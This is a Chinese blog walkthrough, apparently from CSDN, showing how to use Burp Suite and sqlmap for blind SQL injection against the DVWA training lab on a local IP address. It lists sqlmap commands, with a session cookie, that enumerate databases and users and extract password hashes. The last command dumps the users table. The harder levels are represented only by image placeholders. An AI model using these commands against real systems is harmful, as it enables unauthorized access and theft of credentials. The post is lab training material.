用sqlmap实现dvwa中的盲注详解

用sqlmap实现dvwa中的盲注详解

一、 dvwa 低sql盲注
① 启动Burpsuite,在SQL injection(Blind)中输入如下,然后查看Burpsuite中抓到的URL和Cookie。
在这里插入图片描述
② 启动sqlmap,在上图中复制URL和cookie,在sqlmap中输入:sqlmap –u ‘复制的URL’ --cookie=’复制的cookie’ ,可以查看数据库类型。
PHPSESSID=jmrh7e40u41fjch3g2ht57dv00 Cookie: security=low
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” –batch
在这里插入图片描述
在这里插入图片描述
③获得DBMS中所有的数据库名称
构造指令:
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch –dbs
在这里插入图片描述
在这里插入图片描述
④获取Web应用当前连接的数据库
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --current-db
在这里插入图片描述
在这里插入图片描述
⑥ 列出数据库中的所有用户
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch –users
在这里插入图片描述
在这里插入图片描述
⑦ 获取Web应用当前所操作的用户
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --current-user
在这里插入图片描述
在这里插入图片描述
⑧ 列出可连接数据库的所有账户-对应的密码哈希
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --passwords
在这里插入图片描述
在这里插入图片描述
⑨ 列出指定数据库中的所有数据表
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa –tables
在这里插入图片描述
⑩ 列出指定数据表中的所有字段(列)
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa -T users --columns
在这里插入图片描述
⑪ 导出指定数据表中的列字段进行保存
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa -T users -C “user,password” –dump
在这里插入图片描述
二、 dvwa 中sql盲注
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
三、 dvwa 高sql盲注
在这里插入图片描述
四、 dvwa impossible sql盲注
在这里插入图片描述
(dvwa用sqlmap盲注完毕!!!)
后续操作请持续关注哦!!!
了解更多请关注下列公众号:

😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

  • 2
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值